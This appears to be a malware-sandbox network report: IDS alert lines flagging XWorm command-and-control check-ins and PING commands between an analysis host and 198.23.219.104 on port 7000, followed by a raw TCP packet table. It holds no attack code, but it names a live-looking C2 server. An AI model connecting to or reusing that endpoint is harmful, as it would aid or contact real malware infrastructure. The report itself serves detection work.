2024-10-13T19:04:25.380984+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:25.474766+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:25.476203+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:25.529500+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:25.533935+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:25.569982+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:25.573863+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:26.952630+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:26.953644+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:29.281141+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:29.282554+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:29.521201+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:31.485110+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:31.486425+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:34.521100+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:36.002479+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:36.039005+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:36.043671+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:39.439166+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:39.439166+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:39.527841+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:40.867167+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:40.868044+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:44.520683+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:46.611127+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:46.612000+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:04:49.520751+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:54.547630+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:04:59.524112+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:00.991767+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:00.992732+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:01.233229+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:01.234194+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:01.296063+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:01.296893+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:01.321903+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:01.376986+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:01.471174+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:01.472203+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:01.524860+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:01.529937+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:01.565956+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:01.566864+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:01.749449+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:01.750227+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:01.990278+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:01.997514+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:03.909624+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:03.913428+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:04.521062+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:06.842611+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:06.843482+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:09.908847+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:09.908847+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:09.908898+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:09.908933+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:10.057053+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:10.058460+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:12.483271+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:12.486973+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:14.521260+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:14.654711+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:14.655457+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:18.032225+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:18.033934+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:19.520978+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:24.536728+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:29.536508+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:32.877198+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:32.878074+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49739	198.23.219.104	7000	TCP
2024-10-13T19:05:34.536046+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:39.442303+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:39.442303+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:05:39.574643+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	198.23.219.104	7000	192.168.2.4	49739	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 19:01:21.458867073 CEST	49738	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:21.458913088 CEST	443	49738	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:21.459018946 CEST	49738	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:21.469775915 CEST	49738	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:21.469795942 CEST	443	49738	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:22.098721981 CEST	443	49738	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:22.098805904 CEST	49738	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:22.103379011 CEST	49738	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:22.103398085 CEST	443	49738	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:22.103807926 CEST	443	49738	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:22.180860043 CEST	49738	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:22.227413893 CEST	443	49738	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:22.905345917 CEST	443	49738	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:22.905494928 CEST	443	49738	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:22.905606031 CEST	49738	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:22.913469076 CEST	49738	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:23.198618889 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:23.204597950 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:23.204677105 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:23.236747980 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:23.241846085 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:24.479459047 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:24.557893038 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:24.651628017 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:24.657537937 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:24.657658100 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:24.657705069 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:24.657733917 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:24.657816887 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:24.657845020 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:24.657872915 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:29.477991104 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:29.540534973 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:29.545847893 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:29.545869112 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:29.545881987 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:29.546066999 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:29.546133995 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:29.546175003 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:29.546230078 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:34.477344990 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:34.524233103 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:34.529501915 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:34.529550076 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:34.529593945 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:34.529622078 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:34.529649019 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:34.529675961 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:34.529702902 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:38.152239084 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:38.157475948 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:38.262957096 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:38.359719992 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:38.390237093 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:38.395251036 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:39.383490086 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:39.477200985 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:39.477289915 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:39.552607059 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:39.557878971 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:39.558021069 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:39.558135033 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:39.558163881 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:39.558192015 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:39.558240891 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:39.558269024 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:44.477351904 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:44.522207022 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:44.527646065 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:44.527683020 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:44.527717113 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:44.527750969 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:44.527777910 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:44.527806044 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:44.527832985 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:47.346888065 CEST	49749	80	192.168.2.4	208.95.112.1
Oct 13, 2024 19:01:47.352072001 CEST	80	49749	208.95.112.1	192.168.2.4
Oct 13, 2024 19:01:47.352160931 CEST	49749	80	192.168.2.4	208.95.112.1
Oct 13, 2024 19:01:47.352235079 CEST	49749	80	192.168.2.4	208.95.112.1
Oct 13, 2024 19:01:47.357311964 CEST	80	49749	208.95.112.1	192.168.2.4
Oct 13, 2024 19:01:47.903525114 CEST	80	49749	208.95.112.1	192.168.2.4
Oct 13, 2024 19:01:47.953291893 CEST	49749	80	192.168.2.4	208.95.112.1
Oct 13, 2024 19:01:48.110888958 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.110940933 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.111164093 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.140297890 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.140314102 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.768224955 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.768629074 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.768641949 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.770132065 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.770492077 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.771411896 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.771496058 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.771719933 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.771720886 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.771734953 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.771761894 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.771871090 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.771905899 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.772011042 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772064924 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.772145987 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772167921 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.772176027 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772182941 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.772198915 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772208929 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.772212029 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772218943 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.772286892 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772294044 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.772305012 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772314072 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.772350073 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772361040 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.772399902 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772408962 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.772418022 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772427082 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.772459984 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772492886 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772499084 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772515059 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772540092 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772564888 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772614956 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772622108 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772636890 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772686005 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.772695065 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782198906 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.782268047 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782282114 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.782350063 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782358885 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.782368898 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782378912 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.782391071 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782407999 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.782438993 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782450914 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782455921 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.782464027 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782484055 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.782510042 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782526016 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.782532930 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782540083 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782555103 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782588005 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782633066 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782649994 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782720089 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782736063 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782751083 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782768011 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.782805920 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.787369013 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.787502050 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.787512064 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.787528038 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.787553072 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.787558079 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.787569046 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.787616014 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.787648916 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.787653923 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.787657022 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.787672043 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.787678003 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.787691116 CEST	49750	443	192.168.2.4	149.154.167.220
Oct 13, 2024 19:01:48.787698984 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.787782907 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:48.797357082 CEST	443	49750	149.154.167.220	192.168.2.4
Oct 13, 2024 19:01:49.477446079 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:49.531447887 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:49.599128962 CEST	49739	7000	192.168.2.4	198.23.219.104
Oct 13, 2024 19:01:49.604500055 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:49.604547024 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:49.604552984 CEST	7000	49739	198.23.219.104	192.168.2.4
Oct 13, 2024 19:01:49.604587078 CEST	7000	49739	198.23.219.104	192.168.2.4
